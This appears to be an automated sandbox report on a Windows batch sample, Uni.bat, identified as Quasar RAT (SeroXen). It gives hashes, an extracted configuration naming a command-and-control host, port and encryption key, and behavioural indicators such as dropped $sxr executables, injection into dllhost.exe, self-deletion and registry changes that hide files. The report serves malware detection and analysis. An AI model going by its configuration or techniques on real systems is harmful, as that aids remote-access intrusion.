Analysis
-
max time kernel
1200s -
max time network
1198s -
platform
windows11-21h2_x64 -
resource
win11-20240419-en -
resource tags
arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system -
submitted
20-05-2024 16:14
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
Uni.bat
Resource
win11-20240419-en
General
-
Target
Uni.bat
-
Size
12.6MB
-
MD5
898f49c739026123b6a3811fa31abe70
-
SHA1
31ff6036b40d70d21cb1c4c0163cba0d4c720551
-
SHA256
78b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
-
SHA512
a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
-
SSDEEP
49152:sW7ldCjqzV0qZpSjVbHDGYxqXTQPJee/X5nerh1gnfFijx6ygGSPlPNEIKlfuK1u:i
Malware Config
Extracted
quasar
1.0.0.0
v2.2.5 | SeroXen
kimsoylak.ddns.net:4782
2cc9d61f-950d-4f23-b7d5-45d9dda2f256
-
encryption_key
F467D794B2E1081B6AD1EAD5813AFA74F053248D
-
install_name
.exe
-
log_directory
$sxr-Logs
-
reconnect_delay
1
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
Explorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "0" Explorer.EXE -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
Explorer.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" Explorer.EXE -
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/1360-64-0x00000224C1D30000-0x00000224C24FA000-memory.dmp family_quasar -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 5536 created 5328 5536 WerFault.exe dllhost.exe PID 6128 created 4844 6128 WerFault.exe dllhost.exe PID 6064 created 5320 6064 WerFault.exe dllhost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
Processes:
Uni.bat.exe$sxr-powershell.exesvchost.exedescription pid process target process PID 2624 created 632 2624 Uni.bat.exe winlogon.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 2624 created 632 2624 Uni.bat.exe winlogon.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 5036 created 5328 5036 svchost.exe dllhost.exe PID 5036 created 4844 5036 svchost.exe dllhost.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe PID 5036 created 5320 5036 svchost.exe dllhost.exe PID 1360 created 632 1360 $sxr-powershell.exe winlogon.exe -
Deletes itself 1 IoCs
Processes:
Uni.bat.exepid process 2624 Uni.bat.exe -
Executes dropped EXE 5 IoCs
Processes:
Uni.bat.exe$sxr-mshta.exe$sxr-cmd.exe$sxr-powershell.exe$sxr-powershell.exepid process 2624 Uni.bat.exe 2244 $sxr-mshta.exe 4660 $sxr-cmd.exe 1360 $sxr-powershell.exe 3900 $sxr-powershell.exe -
Drops file in System32 directory 12 IoCs
Processes:
svchost.exeOfficeClickToRun.exesvchost.exeDllHost.exedescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe -
Suspicious use of SetThreadContext 18 IoCs
Processes:
Uni.bat.exe$sxr-powershell.exedescription pid process target process PID 2624 set thread context of 2604 2624 Uni.bat.exe dllhost.exe PID 2624 set thread context of 2452 2624 Uni.bat.exe dllhost.exe PID 1360 set thread context of 4868 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 2156 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 3552 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 3044 1360 $sxr-powershell.exe dllhost.exe PID 2624 set thread context of 4672 2624 Uni.bat.exe dllhost.exe PID 2624 set thread context of 1064 2624 Uni.bat.exe dllhost.exe PID 1360 set thread context of 6024 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5056 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5264 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5328 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 4844 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5776 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5320 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 6124 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5224 1360 $sxr-powershell.exe dllhost.exe PID 1360 set thread context of 5536 1360 $sxr-powershell.exe dllhost.exe -
Drops file in Windows directory 7 IoCs
Processes:
Uni.bat.exeWerFault.exedescription ioc process File opened for modification C:\Windows\$sxr-cmd.exe Uni.bat.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\$sxr-powershell.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-powershell.exe Uni.bat.exe File created C:\Windows\$sxr-mshta.exe Uni.bat.exe File opened for modification C:\Windows\$sxr-mshta.exe Uni.bat.exe File created C:\Windows\$sxr-cmd.exe Uni.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 4192 5328 WerFault.exe dllhost.exe -
Checks processor information in registry 2 TTPs 23 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exesvchost.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 2284 taskkill.exe -
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE -
Modifies data under HKEY_USERS 57 IoCs
Processes:
OfficeClickToRun.exesvchost.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={453AF952-5678-4983-A91B-F7D586F23203}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 20 May 2024 16:19:24 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716221964" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe -
Modifies registry class 40 IoCs
Processes:
Explorer.EXEsvchost.exe$sxr-mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Rev = "0" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\MRUListEx = ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 47a70b61d1aada01 svchost.exe Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0 = 5600310000000000b4584682100057696e646f777300400009000400efbec5522d60b45846822e000000a60500000000010000000000000000000000000000001f182301570069006e0064006f0077007300000016000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 00000000ffffffff Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616193" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft\SystemCertificates\AuthRoot\AutoUpdate\Disallow = 1f721061d1aada01 svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ $sxr-mshta.exe Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software svchost.exe Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\NodeSlot = "4" Explorer.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Software\Microsoft svchost.exe Set value (data) 